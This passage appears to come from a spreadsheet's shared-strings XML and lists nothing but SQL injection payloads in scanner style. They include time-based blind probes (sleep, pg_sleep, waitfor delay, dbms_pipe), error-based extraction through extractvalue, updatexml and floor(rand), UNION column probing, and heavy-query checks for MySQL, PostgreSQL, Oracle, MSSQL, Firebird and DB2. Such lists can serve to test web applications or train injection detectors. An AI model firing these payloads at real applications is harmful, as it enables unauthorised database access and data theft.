    <t>1  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( 5368 = 5368</t>
  </si>
  <si>
    <t>1 )  as sdnd where 9472 = 9472</t>
  </si>
  <si>
    <t>-8966%' or  ( 7475 = 4014 ) *4014 and '%' = '</t>
  </si>
  <si>
    <t>1' rlike sleep ( 5 )  and 'gtfo' = 'gtfo</t>
  </si>
  <si>
    <t>1" )  as vpna where 5450 = 5450 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "fogb" like "fogb</t>
  </si>
  <si>
    <t>1" )  as advz where 5166 = 5166 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and 'eskp' like 'eskp</t>
  </si>
  <si>
    <t>1 )  where 7815 = 7815 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1  )  )   as xsyk where 2575 = 2575 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>select  ( case when  ( 7005 = 7118 )  then 1 else 7005* ( select 7005 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>-6815 where 7609 = 7609 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>select  ( case when  ( 4690 = 4373 )  then 4690 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-9996' or make_set ( 1237 = 7111,7111 ) </t>
  </si>
  <si>
    <t>-5372" )  as wlqm where 2432 = 2432 union all select 2432,2432,2432,2432,2432,2432#</t>
  </si>
  <si>
    <t>-7731"  )  )   or make_set ( 2551 = 4389,4389 )  and   (  (  "unly" like "unly</t>
  </si>
  <si>
    <t>-1648  )  )   as oqqy where 3459 = 3459 or 6872 = 6872--</t>
  </si>
  <si>
    <t>-7430' )  as xfah where 1596 = 1596 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113</t>
  </si>
  <si>
    <t>1%'  )  )   procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'ekhi' = 'ekhi</t>
  </si>
  <si>
    <t>1' where 9156 = 9156 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-9779'  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  'hmzj' = 'hmzj</t>
  </si>
  <si>
    <t>1%"  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as gfzb where 7904 = 7904</t>
  </si>
  <si>
    <t>1'|| ( select 'rqzu' from dual where 9516 = 9516 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1 )  union all select null,null--</t>
  </si>
  <si>
    <t>-8881%' union all select 8420,8420,8420,8420,8420,8420,8420#</t>
  </si>
  <si>
    <t>1 )  as vqbf where 4020 = 4020</t>
  </si>
  <si>
    <t>1'  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  'pcim' = 'pcim</t>
  </si>
  <si>
    <t>1 )  as hhly where 2906 = 2906</t>
  </si>
  <si>
    <t>1  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 7589 = 7589</t>
  </si>
  <si>
    <t>1  )  )   as ynzg where 1926 = 1926 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>1%' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( '%' = '</t>
  </si>
  <si>
    <t>-8729'+ ( select 'nbzl' where 7160 = 7160 order by 1#</t>
  </si>
  <si>
    <t>1'+ ( select dgnt where 4701 = 4701 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1" )  and 6565 = 2647 and  ( "mrge" like "mrge</t>
  </si>
  <si>
    <t>1" )  and elt ( 6651 = 1172,1172 )  and  ( "zfkb" like "zfkb</t>
  </si>
  <si>
    <t>1'+ ( select 'dkxk' where 1241 = 1241 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-3881  )  )   )  union all select 4438--</t>
  </si>
  <si>
    <t>1'|| ( select 'xdzp' from dual where 5786 = 5786 and  ( 3020 = 3020 ) *6703 ) ||'</t>
  </si>
  <si>
    <t>1  )  )   as trin where 8843 = 8843</t>
  </si>
  <si>
    <t>1"  )  )   as ihfw where 3949 = 3949 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>-4355"  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1 where 3802 = 3802 and 2006 = 2006</t>
  </si>
  <si>
    <t>1%' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) -- knpw</t>
  </si>
  <si>
    <t>-9764' where 1266 = 1266 or elt ( 4069 = 6162,6162 ) --</t>
  </si>
  <si>
    <t>1 )  where 2781 = 2781 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as jzoh where 6484 = 6484 and 7364 = 4233--</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'cdaq' like 'cdaq</t>
  </si>
  <si>
    <t>1%' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>1 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  -- yczq</t>
  </si>
  <si>
    <t>1" )  where 4964 = 4964</t>
  </si>
  <si>
    <t>1%'  )  )   )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #</t>
  </si>
  <si>
    <t>1 where 6408 = 6408 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-6883" )  as tbai where 8121 = 8121 union all select 8121,8121,8121,8121,8121,8121,8121,8121--</t>
  </si>
  <si>
    <t>-7238%' or make_set ( 5375 = 9563,9563 )  and '%' = '</t>
  </si>
  <si>
    <t>-5596'  )  )   )  union all select 4877,4877,4877,4877,4877,4877,4877,4877,4877,4877--</t>
  </si>
  <si>
    <t>1%" )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-8893%' )  union all select 1254,1254--</t>
  </si>
  <si>
    <t>-5225'  )  )   as zats where 5629 = 5629 union all select 5629,5629,5629,5629,5629--</t>
  </si>
  <si>
    <t xml:space="preserve">1" and make_set ( 8403 = 8403,8899 ) </t>
  </si>
  <si>
    <t>-3849 )  or 5580 = 3442--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( "poee" = "poee</t>
  </si>
  <si>
    <t>1  )  )   as somz where 1598 = 1598</t>
  </si>
  <si>
    <t>-9148 )  where 2027 = 2027 or 8571 = 8571--</t>
  </si>
  <si>
    <t>1' in boolean mode )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and  ( 'wweo' = 'wweo</t>
  </si>
  <si>
    <t>-5780 or make_set ( 3464 = 4518,4518 ) -- icit</t>
  </si>
  <si>
    <t>-8612" )  or 4043 = 3083 and  ( "pjzo" like "pjzo</t>
  </si>
  <si>
    <t>select  ( case when  ( 3681 = 5026 )  then 3681 else 3681* ( select 3681 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-1304' )  union all select 7639#</t>
  </si>
  <si>
    <t>1' and elt ( 4249 = 4249,7259 )  and 'pgvz' = 'pgvz</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 1609 = 1609 )  then waitfor delay '0:0:5' else 1609* ( select 1609 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'blvu' from dual where 9813 = 9813</t>
  </si>
  <si>
    <t>select * from generate_series ( 3607,3607,case when  ( 3607 = 4242 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1" )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( "ynde" = "ynde</t>
  </si>
  <si>
    <t>1  )  )   as dhge where 4816 = 4816 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  'sucj' = 'sucj</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select qmez where 3729 = 3729 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-4384'  )  )   )  or 6872 = 6872 and   (  (   ( 'ukhl' = 'ukhl</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>select  ( case when  ( 3344 = 8103 )  then 3344 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1"  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  "ubxw" like "ubxw</t>
  </si>
  <si>
    <t>1%' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1" )  where 9499 = 9499</t>
  </si>
  <si>
    <t>select  ( case when  ( 6839 = 2730 )  then 6839 else 6839* ( select 6839 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1"  )  )   as qhnb where 8302 = 8302 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>-1048%" or 3038 = 3038</t>
  </si>
  <si>
    <t>1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'lvck' = 'lvck</t>
  </si>
  <si>
    <t>-3211  )  )   as fsej where 6348 = 6348 or 9805 = 3783--</t>
  </si>
  <si>
    <t>1" )  where 3826 = 3826</t>
  </si>
  <si>
    <t>-4889"  )  )   as vvuo where 8060 = 8060 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>-8432 )  union all select 8169,8169,8169,8169,8169,8169,8169,8169,8169,8169--</t>
  </si>
  <si>
    <t>1" where 6347 = 6347 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'jjmt' = 'jjmt</t>
  </si>
  <si>
    <t>-2048  )  )   union all select 7054,7054,7054,7054,7054,7054,7054,7054,7054--</t>
  </si>
  <si>
    <t>1%" and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">-5863" or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 </t>
  </si>
  <si>
    <t>select sleep ( 5 ) -- waln</t>
  </si>
  <si>
    <t>1" or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "zcfa" = "zcfa</t>
  </si>
  <si>
    <t>-7806"  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  "vlrj" like "vlrj</t>
  </si>
  <si>
    <t>1  )  )   )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>-1868" )  where 9495 = 9495 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1'+ ( select aqhj where 4419 = 4419</t>
  </si>
  <si>
    <t>1" and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "vukd" = "vukd</t>
  </si>
  <si>
    <t>1 )  and 3659 = 5475 and  ( 8949 = 8949</t>
  </si>
  <si>
    <t>1%'  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1" )  where 2657 = 2657 and 5309 = 7592--</t>
  </si>
  <si>
    <t>1" )  as qjyu where 2679 = 2679 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'opll' like 'opll</t>
  </si>
  <si>
    <t>1' )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 'yabn' = 'yabn</t>
  </si>
  <si>
    <t>1'+ ( select yfuu where 1717 = 1717 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'brlc' = 'brlc</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>-6755 )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>-7469 )  where 5875 = 5875 or make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>1' where 4388 = 4388</t>
  </si>
  <si>
    <t>1'+ ( select bldn where 8321 = 8321 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "yrgy" like "yrgy</t>
  </si>
  <si>
    <t>select * from generate_series ( 3990,3990,case when  ( 3990 = 9597 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-5062"  )  )   )  or  ( 1069 = 8974 ) *8974 and   (  (   ( "hsge" = "hsge</t>
  </si>
  <si>
    <t>1"  )  )   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-7460" union all select 4273,4273,4273,4273,4273,4273,4273,4273#</t>
  </si>
  <si>
    <t>1'|| ( select 'aioq' from dual where 8176 = 8176</t>
  </si>
  <si>
    <t xml:space="preserve">1" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) </t>
  </si>
  <si>
    <t>1  )  )   as oqfr where 6426 = 6426 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>-3379 )  union all select 4985,4985,4985,4985,4985,4985,4985,4985,4985,4985--</t>
  </si>
  <si>
    <t>1%"  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  union all select null--</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  'xaoi' = 'xaoi</t>
  </si>
  <si>
    <t>1"  )  )   as maxe where 5883 = 5883 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( 'cewn' = 'cewn</t>
  </si>
  <si>
    <t>1' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'yfkk' = 'yfkk</t>
  </si>
  <si>
    <t>1' or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and 'kdxg' like 'kdxg</t>
  </si>
  <si>
    <t>select case when 3252 = 9622 then 1 else null end--</t>
  </si>
  <si>
    <t>-9556 or  ( 2049 = 6967 ) *6967# mhbc</t>
  </si>
  <si>
    <t>1'+ ( select 'mquh' where 3933 = 3933</t>
  </si>
  <si>
    <t>1' )  as ghks where 5128 = 5128 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'swjk' = 'swjk</t>
  </si>
  <si>
    <t>1'  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  'tblb' = 'tblb</t>
  </si>
  <si>
    <t>-2452'  )  )   )  union all select 1951--</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>select * from generate_series ( 9434,9434,case when  ( 9434 = 3991 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-3037 )  where 9024 = 9024 union all select 9024,9024--</t>
  </si>
  <si>
    <t>1%" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>-3666"  )  )   )  union all select 4136,4136,4136--</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (   ( 'gsjp' = 'gsjp</t>
  </si>
  <si>
    <t>1'+ ( select 'vnue' where 5807 = 5807</t>
  </si>
  <si>
    <t>1' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'rxdz' = 'rxdz</t>
  </si>
  <si>
    <t>1'|| ( select 'vsfg' where 3547 = 3547 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161  )  )  ||'</t>
  </si>
  <si>
    <t>1" where 8918 = 8918  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>1' where 8770 = 8770 union all select null--</t>
  </si>
  <si>
    <t>1' )  where 2763 = 2763</t>
  </si>
  <si>
    <t>1" )  where 5814 = 5814 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'nvsy' like 'nvsy</t>
  </si>
  <si>
    <t>-8614' )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-9143 )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 3681 = 5989 )  then 3681 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>select * from generate_series ( 7407,7407,case when  ( 7407 = 6562 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-1168  )  )   as vlol where 3475 = 3475 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-9456%"  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1 )  as czeu where 1738 = 1738 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>-3856" )  as iyzl where 7394 = 7394 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 )</t>
  </si>
  <si>
    <t>1' )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( 'ylit' like 'ylit</t>
  </si>
  <si>
    <t>1' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'wfws' = 'wfws</t>
  </si>
  <si>
    <t>-5134  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>-3461"  )  )   union all select 6342,6342,6342,6342,6342,6342#</t>
  </si>
  <si>
    <t>1" )  as hfvz where 7186 = 7186 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select case when 4176 = 6138 then 1 else null end--</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 5433 = 5433 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>1%"  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1" )  where 6956 = 6956 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' and sleep ( 5 ) </t>
  </si>
  <si>
    <t>1%'  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  '%' = '</t>
  </si>
  <si>
